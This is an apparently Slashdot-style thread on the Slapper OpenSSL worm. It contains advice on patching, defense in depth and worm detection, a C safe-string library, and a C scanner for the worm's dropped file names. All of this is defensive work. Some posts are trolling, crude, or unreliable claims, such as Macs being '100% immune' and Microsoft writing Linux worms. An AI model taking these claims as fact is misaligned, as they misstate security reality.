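The length-tracking string functions the comment above asks for, and the kind of stack-frame overrun that libsafe (described further up in this thread) can only catch after the fact, look roughly like this. This is an added example, not OpenSSL, libsafe or any poster's code; the bstr type and its function names are hypothetical and chosen for the illustration. The point is that every writer knows both the current length and the capacity, so an oversized append is refused and reported instead of silently running past the end of the caller's buffer as strcpy()/strcat() do:

```c
#include <stddef.h>
#include <string.h>

/*
 * Added example: a minimal length-tracking string type (hypothetical name
 * "bstr"). Not OpenSSL code. The buffer is always NUL-terminated and the
 * invariant len <= cap - 1 holds, so no append can overrun the storage.
 */
typedef struct {
    char  *buf;  /* caller-provided storage, always NUL-terminated */
    size_t len;  /* bytes in use, not counting the NUL */
    size_t cap;  /* total storage in bytes, including room for the NUL */
} bstr;

/* Bind a bstr to 'cap' bytes of storage. Returns 0 on success, -1 on bad input. */
int bstr_init(bstr *s, char *storage, size_t cap)
{
    if (s == NULL || storage == NULL || cap == 0)
        return -1;
    s->buf = storage;
    s->cap = cap;
    s->len = 0;
    s->buf[0] = '\0';
    return 0;
}

/*
 * Append exactly n bytes from src, which need not be NUL-terminated (think
 * of a field pulled straight out of a handshake message). All-or-nothing:
 * returns 0 on success; if the result would not fit, returns -1 and s is
 * left untouched. The check is written so the subtraction cannot underflow.
 */
int bstr_append_n(bstr *s, const char *src, size_t n)
{
    if (s == NULL || src == NULL)
        return -1;
    if (n > s->cap - 1 - s->len)
        return -1;
    memcpy(s->buf + s->len, src, n);
    s->len += n;
    s->buf[s->len] = '\0';
    return 0;
}

/* Append a NUL-terminated C string; same all-or-nothing contract. */
int bstr_append(bstr *s, const char *src)
{
    return (src == NULL) ? -1 : bstr_append_n(s, src, strlen(src));
}

/* Replace the contents (the strcpy() replacement); same contract. */
int bstr_copy(bstr *s, const char *src)
{
    if (s == NULL || src == NULL)
        return -1;
    size_t n = strlen(src);
    if (n > s->cap - 1)
        return -1;
    memcpy(s->buf, src, n);
    s->len = n;
    s->buf[n] = '\0';
    return 0;
}

/*
 * Demonstration: a fixed 16-byte "client id" field on the stack, as a
 * handshake parser might hold one. The first two appends fit (15 bytes);
 * the third would need 18 bytes plus the NUL and is refused, so the stack
 * frame is never touched. Returns the number of refused appends (1).
 */
int demo_refused_appends(void)
{
    char storage[16];
    bstr id;
    int refused = 0;
    bstr_init(&id, storage, sizeof storage);
    if (bstr_append(&id, "client-") != 0)  refused++;  /* 7 bytes */
    if (bstr_append(&id, "00000042") != 0) refused++;  /* 15 bytes total: fits */
    if (bstr_append(&id, "XYZ") != 0)      refused++;  /* 18 bytes: refused */
    return refused;
}
```

The all-or-nothing contract is deliberate: silently truncating (as strncpy() and strlcpy() do) keeps the process alive but hands the rest of the program a value the peer never sent, whereas refusing forces the caller to handle the oversize case explicitly, which is where a handshake parser should reject the message.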
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkroot version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at it, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger
http://www.practical-tech.com/network/n09182002.htm
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
Worst episode ever!
Comic-Book Guy was here...
Believe it or not, a goatsex link was modded Insightful. I shit you not.
here ya go ...
While you're right in part about the importance of securing a system, you miss out completely on the importance of defense in depth.
The worst flaw of them all in any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail, and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me illustrate some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style: "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! All data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think the stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rather than the whole server, even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extent be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
Please correct me if I got my facts wrong.
It started with kernel version after version fixing memory holes etc etc.
...
Then it continued with the Linux movement being torn apart by different versions of Linux.
Now there is enough investment in Linux that it is profitable for virus makers.
Unless the Linux community unites and fights all attempts to make money from Linux, building better tools, and not allowing Icaza-like attempts to profit...
The future:
a Linux as fully bugged as Windows..
The trend is very clear: viruses will grow. Stop being such maniacs thinking Linux is perfect, and start making it better in reality.
Stop the trend!!!!!!!!!!!
Look for the following (from CERT):
/tmp/.uubugtraq /tmp/.bugtraq.c /tmp/.bugtraq /tmp/.unlock.c /tmp/.update.c /tmp/.cinik /tmp/.cinik.c /tmp/.cinik.go /tmp/.cinik.goecho /tmp/.cinik.uu
Variant "A"
Variant "B"
Variant "C"
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privileges and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
Try to hack my 31337 firewall!
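A small scanner for the dropped-file names listed in the comment above, as an added example (not CERT's or any poster's code). It walks one directory, normally /tmp, and flags an entry either because its name is on that list or, as an assumed heuristic that goes slightly beyond the list, because it is a hidden *.c file, since the worm has to leave its source somewhere it can hand it to gcc. The function and variable names are hypothetical, and the self-check works on a scratch directory it creates and removes itself so the real /tmp is left alone:

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Dropped-file basenames as listed (from CERT) in the comment above. */
static const char *const SLAPPER_NAMES[] = {
    ".uubugtraq", ".bugtraq.c", ".bugtraq", ".unlock.c", ".update.c",
    ".cinik", ".cinik.c", ".cinik.go", ".cinik.goecho", ".cinik.uu"
};

/* Assumed heuristic: a hidden C source file in a temp directory is suspicious. */
int is_hidden_c_source(const char *name)
{
    size_t n = strlen(name);
    return name[0] == '.' && n > 2 && strcmp(name + n - 2, ".c") == 0;
}

/*
 * Scan 'dir' and print each suspicious entry. Returns the number of hits,
 * or -1 if the directory cannot be opened. Matching is by exact basename
 * only; a renamed copy of the worm would need other indicators.
 */
int scan_for_slapper_files(const char *dir)
{
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;
    int hits = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        const char *name = e->d_name;
        int known = 0;
        for (size_t i = 0; i < sizeof SLAPPER_NAMES / sizeof SLAPPER_NAMES[0]; i++) {
            if (strcmp(name, SLAPPER_NAMES[i]) == 0) {
                known = 1;
                break;
            }
        }
        if (known || is_hidden_c_source(name)) {
            printf("suspicious: %s/%s (%s)\n", dir, name,
                   known ? "known Slapper name" : "hidden C source");
            hits++;
        }
    }
    closedir(d);
    return hits;
}

/*
 * Self-check on a scratch directory (constructed sample, not real worm
 * files): one known name, one unrelated hidden .c file and one harmless
 * file. Expects 2 hits, then removes everything again. Returns the hit
 * count, or -1 if the scratch directory could not be created.
 */
int selftest_scan(void)
{
    char dir[64], path[128];
    const char *names[] = { ".bugtraq.c", ".notslapper.c", "harmless.txt" };
    snprintf(dir, sizeof dir, "/tmp/slapper-scan-%ld", (long)getpid());
    if (mkdir(dir, 0700) != 0)
        return -1;
    for (int i = 0; i < 3; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        FILE *f = fopen(path, "w");
        if (f != NULL)
            fclose(f);
    }
    int hits = scan_for_slapper_files(dir);
    for (int i = 0; i < 3; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        unlink(path);
    }
    rmdir(dir);
    return hits;
}

int main(void)
{
    int hits = scan_for_slapper_files("/tmp");
    printf("%d suspicious entries in /tmp\n", hits);
    return hits > 0;
}
```

Run it as the user that owns the web server as well as root, since /tmp entries dropped through an apache shell belong to that user; a clean result only says the listed names are absent, which is why the comment above pairs the file check with blocking the worm's ports and patching OpenSSL.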
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them:
"Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
INVADE BRITAIN!!!!
anti-virus as a cure?
... a virus that infects computers the same way the Slapper viruses do, but then patches the security breach instead of exploiting it further?
This may just be a naive question from a simple web programmer, but why can't someone just write an 'anti-virus'?
Lern tu speek and wryt englsh u bunghole. The word IS VIRII! Viruses sounds like something that an ignorant New York hooker would say. Like "oohh... I slapted my asseses!"
Half-wits at Symantec haven't figured out that Linux is a completely different market than the Microsoft open-door-policy-to-exploit market.
Why are you making this much more complicated than necessary? I would not even think of downloading a fix for my SuSE system from any outside source. Sign up for the SuSE security mailing list and you will be notified, then disable the service or take appropriate measures until the SuSE security team releases the patch. Download the patch from SuSE and apply it.
microsoft is writing the linux worms.
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
Yeah, well, the service that this worm exploits is ON. Which makes your point absolutely moot.
I found this at google:
mefus
In Open Society, GPL Software frees YOU!
Slackware 8.1 has libsafe as one of the packages in /extra directory.
--- d'oh
No Mac OS 9 or OS 8 server was EVER exploited in the entire BugTraq database history.
Based on 7 years or more of historical fact, Macs are 100% immune running web servers on the net. There are many technical reasons why Macs are the most secure OS.
Is this a virus based upon a bug in an old version that has been patched and got quite a bit of publicity not too long ago?
Shoot Pixels, Not People!
Where have you folks been? This has been around and in the news for well over a week. Those of us who were vulnerable and cared about security have long since updated OpenSSL and moved on.
"We don't do a new version to fix bugs." - Bill Gates
"The new version - it's not there to fix bugs." - Bill Gates
-- Retranslated from Focus 43/1995, pp. 206-212
- this post brought to you by the Automated Last Post Generator...